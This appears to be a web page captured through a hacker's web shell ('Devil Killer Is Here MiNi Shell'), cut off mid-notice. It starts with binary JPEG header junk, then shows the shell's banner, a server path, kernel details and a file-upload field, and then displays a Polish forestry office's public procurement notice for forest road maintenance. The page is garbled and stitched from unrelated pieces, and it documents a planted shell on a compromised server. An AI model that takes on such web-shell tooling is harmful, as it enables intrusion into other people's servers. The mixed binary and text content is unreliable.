JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220526/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220526/0017881601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utrzymanie i konserwacja dróg leśnych na terenie Nadleśnictwa Jastrowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Jastrowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570064398</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Roosevelta 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jastrowie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-915</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jastrowie@pila.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://jastrowie.pila.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa PGL LP Nadleśnictwo Jastrowie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie i konserwacja dróg leśnych na terenie Nadleśnictwa Jastrowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-512c7fa7-dcd8-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00178816</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.pila.lasy.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">uprawnionymi do porozumiewania się z Wykonawcami są: p. Krzysztof Dietrich – w sprawach<br/>merytorycznych, e- mail: krzysztof.dietrich@pila.lasy.gov.pl; p. Łukasz Opioła – w sprawach procedury<br/>udzielania zamówień publicznych, e- mail: lukasz.opiola@pila.lasy.gov.plod poniedziałku do piątku w<br/>godz. 7:00 – 15:00, z wyłączeniem dni wolnych od pracy. Komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu platformy eZAMAWIAJĄCY oraz poczty elektronicznej z<br/>zastrzeżeniem, że składanie ofert odbywa się wyłącznie poprzez platformę przetargową<br/>eZAMAWIAJĄCY. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na platformie eZamawiający. Wykonawca posiadający<br/>konto na ww. platformie ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do<br/>formularza do komunikacji. Ogólne zasady korzystania z Platformy:1)zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do Systemu na subdomenie Regionalnej Dyrekcji Lasów<br/>Państwowych w Pile pod adresem internetowym Platforma eZamawiający -<br/>https://zamowienia.pila.lasy.gov.pl/ lub Platforma Zakupowa Marketplanet<br/>https://oneplace.marketplanet.pl.2)Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie<br/>przekierowany do strony Platforma Zakupowa Marketplanet https://oneplace.marketplanet.pl/, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca<br/>zakłada konto wykonując kroki procesu rejestracyjnego: podaje adres e-mail, ustanawia hasło,<br/>następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”;<br/>3)rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci<br/>elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się<br/>pod numerem telefonu podanym w ww. potwierdzeniu;4)po założeniu konta Wykonawca ma możliwość<br/>złożenia Oferty w postępowaniu oraz sporządzania, wysyłania i odbierania korespondencji elektronicznej;5)Ofertę wraz z wymaganymi załącznikami składa się w postaci elektronicznej,<br/>opatrzonych kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym<br/>przez osoby umocowane, pod rygorem nieważności na Platformie eZamawiający pod adresem<br/>internetowym: https://zamowienia.pila.lasy.gov.pl/ w zakładce „Oferty”.6)korzystanie z Platformy<br/>eZamawiający jest bezpłatne.Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne<br/>umożliwiające pracę na Platformie eZamawiający, tj.:1)stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512 kb/s;2)komputer klasy PC lub MAC, o następującej konfiguracji:<br/>pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac<br/>Os x 10.4, Linux, lub ich nowsze wersje;3)zainstalowana dowolna przeglądarka internetowa<br/>obsługująca TLS 1.2, najlepiej w najnowszej wersji, w przypadku Internet Explorer minimalnie wersja<br/>10.0;4)włączona obsługa JavaScript;5)zainstalowany program Acrobat Reader lub inny obsługujący<br/>pliki w formacie .pdf.Zamawiający określa dopuszczalne formaty przesyłanych danych, tj.: plików o<br/>wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, docx, xlsx, csv, jpg, jpeg, tif, png, svg,<br/>zip, tar, gz, gzip, 7z, XAdES, CAdES, PAdES.Wymagania techniczne oraz organizacyjne, dotyczące<br/>komunikacji Zamawiającego z Wykonawcami, zasady funkcjonowania Platformy eZamawiający, a<br/>także sposób składania ofert oraz zamieszczania przez Wykonawców wszelkich oświadczeń,<br/>wniosków, zawiadomień, odwołań oraz informacji określa również Instrukcja dla Wykonawców, dostępna na Platformie eZamawiający w zakładce „Regulacje i procedury procesu zakupowego”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L119 z 04 maja 2016 r., str. 1 – dalej „RODO”) Zamawiający informuje, iż administratorem<br/>danych osobowych jest Nadleśnictwo Jastrowie.2. Zamawiający przetwarza dane osobowe zebrane w<br/>niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie<br/>przed ich bezprawnym rozpowszechnianiem. 3. Zamawiający udostępnia dane osobowe, o których<br/>mowa w art.10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w<br/>dziale VIPZP, do upływu terminu do ich wniesienia. 4. Do przetwarzania danych osobowych, o których<br/>mowa wart. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby<br/>dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności. 5. Dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak<br/>również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w<br/>sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o<br/>udzielenie zamówienia i jego archiwizacji.6. Odbiorcami danych osobowych będą osoby lub<br/>podmioty,którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP.7.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 97 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata,okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego.8.Niezależnie od postanowień pkt 7. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dane osobowe pozyskane w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym<br/>usługi doradcze, w tym usługi prawne i konsultingowe. 10. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.11. Osoba, której<br/>dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo:1)<br/>dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie dużego wysiłku<br/>Zamawiający może żądać wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego postępowania o<br/>udzielenie zamówienia publicznego;2) do sprostowana swoich danych osobowych – zgodnie z art. 16<br/>RODO, przy czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o<br/>którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie<br/>może naruszać integralności protokołu oraz jego załączników;3) do żądania od Zamawiającego – jako<br/>administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego; prawo to nie ogranicza przetwarzania<br/>danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;4)<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż<br/>przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.12. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych określa PZP.13. Osobie, której dane osobowe zostały<br/>pozyskane przez Zamawiającego w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego nie przysługuje:1) prawo do usunięcia danych osobowych, o czym przesadza<br/>art. 17 ust. 3 lit. b, d lub e RODO, 2) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to<br/>z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>14. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub<br/>innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania<br/>realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do<br/>podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest robota budowlana polegająca na „Utrzymaniu i konserwacji dróg leśnych w Nadleśnictwie Jastrowie”. Szczegółowy opis przedmiotu zamówienia zamieszczono w Załącznikach nr 4 i 5 do SWZ.<br/>3.2.	Przedmiot zamówienia nie został podzielony na części.<br/>3.3.	Nazwy i kody dotyczące przedmiotu zamówienia określone zgodnie ze Wspólnym Słownikiem Zamówień (CPV):<br/>	45000000-7 – Roboty budowlane, <br/>	45233120-6 – Roboty w zakresie budowy dróg,<br/>	45100000-8 – Przygotowanie terenu pod budowę,<br/>	45112000-5 – Roboty w zakresie usuwania gleby,<br/>3.4.	Szczegółowy zakres prac, jakie w ramach przedmiotu zamówienia ma wykonać Wykonawca zawarty jest w: <br/>a)	Opisie robót, <br/>b)	Przedmiarze robót,<br/>Wskazana w SWZ ilość prac wchodzących w zakres Przedmiotu Umowy ma charakter szacunkowy. Ilość prac zleconych do wykonania w trakcie realizacji Umowy może być mniejsza od ilości przewidzianej w SWZ, co jednak nie może być podstawą do jakichkolwiek roszczeń w stosunku do Zamawiającego. Zamawiający może zlecić w trakcie realizacji umowy zakres prac mniejszy niż wskazany w SWZ, jednak nie niższy niż 70 % Wartości Przedmiotu Umowy określonej w umowie (załącznik nr 7 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, o wartości do 30% wartości zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu podobnych robót stanowiących przedmiot niniejszego zamówienia, tj. prac z zakresu budowy drogi.<br/>Zamówienia, o których mowa w pkt 5.1. będą polegały na powtórzeniu robót budowlanych zgodnych z robotami stanowiącymi przedmiot niniejszego zamówienia. Zakresem rzeczowym robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.1. będą prace z zakresu budowy, przebudowy dróg obejmujące czynności wskazane rodzajowo w rozdziale 3 SWZ, w załącznikach nr 4 i 5 do SWZ i czynności wskazane powyżej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przy wyborze ofert zamówienia Zamawiający będzie się kierował<br/>następującymi kryteriami oceny ofert:1) Cena - 60 %,2) Gwarancja - 40 %,2.Sposób obliczania<br/>punktów dla poszczególnych kryteriów:1) W ramach kryterium „Cena” ocena ofert zostanie dokonana<br/>przy zastosowaniu wzoru: Cn C = ------------ x100 pkt x 60 % Co gdzie:C – liczba punktów w ramach<br/>kryterium „Cena”,Cn - najniższa cena spośród ofert ocenianychCo - cena oferty ocenianej Ocenie w<br/>ramach kryterium „Cena” podlegać będzie cena brutto za wykonanie całego zamówienia podana w<br/>formularzu Oferty (Załącznik nr 1 do SWZ).Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono<br/>ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z<br/>przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z<br/>tymi przepisami.2) W ramach kryterium „Gwarancja” Zamawiający dokona oceny ofert w następujący<br/>sposób: Oferty w tym kryterium oceniane będą w odniesieniu do najdłuższego terminu gwarancji<br/>przedstawionego przez Wykonawców zastrzegając, iż minimalny termin gwarancji wynosi 12 miesiące,<br/>przy uwzględnieniu następujących zasad oceny punktowej:- 0 pkt – 12 miesięcy gwarancji, - 20 pkt –<br/>18 miesięcy gwarancji, - 40 pkt – 24 i więcej miesięcy gwarancji.Informacje dotyczące terminu gwarancji Wykonawca poda w formularzu oferty – załączniku nr 1 do SWZ. W przypadku niepodania informacji dotyczących terminu gwarancji w formularzu oferty, do oceny punktowej przyjęty zostanie minimalny termin gwarancji wynoszący 12 miesięcy, i taki termin zostanie wskazany w umowie. Oferta z najdłuższym terminem gwarancji otrzyma maksymalną liczbę punktów,3.Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów.4.Jeżeli nie można dokonać wyboru<br/>najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu, dotyczące:1) zdolności do występowania w obrocie gospodarczym.Zamawiający<br/>nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w<br/>postępowaniu.2) uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z<br/>odrębnych przepisów.Zamawiający nie stawia szczególnych wymagań w zakresie opisu<br/>spełniania tego warunku udziału w postępowaniu.3) sytuacji ekonomicznej lub finansowej.-<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w<br/>postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej. - Warunek w odniesieniu<br/>do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki<br/>finansowe lub zdolność kredytową nie mniejszą niż: 80.000,00 zł.4) zdolności technicznej lub<br/>zawodowej:a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie: • 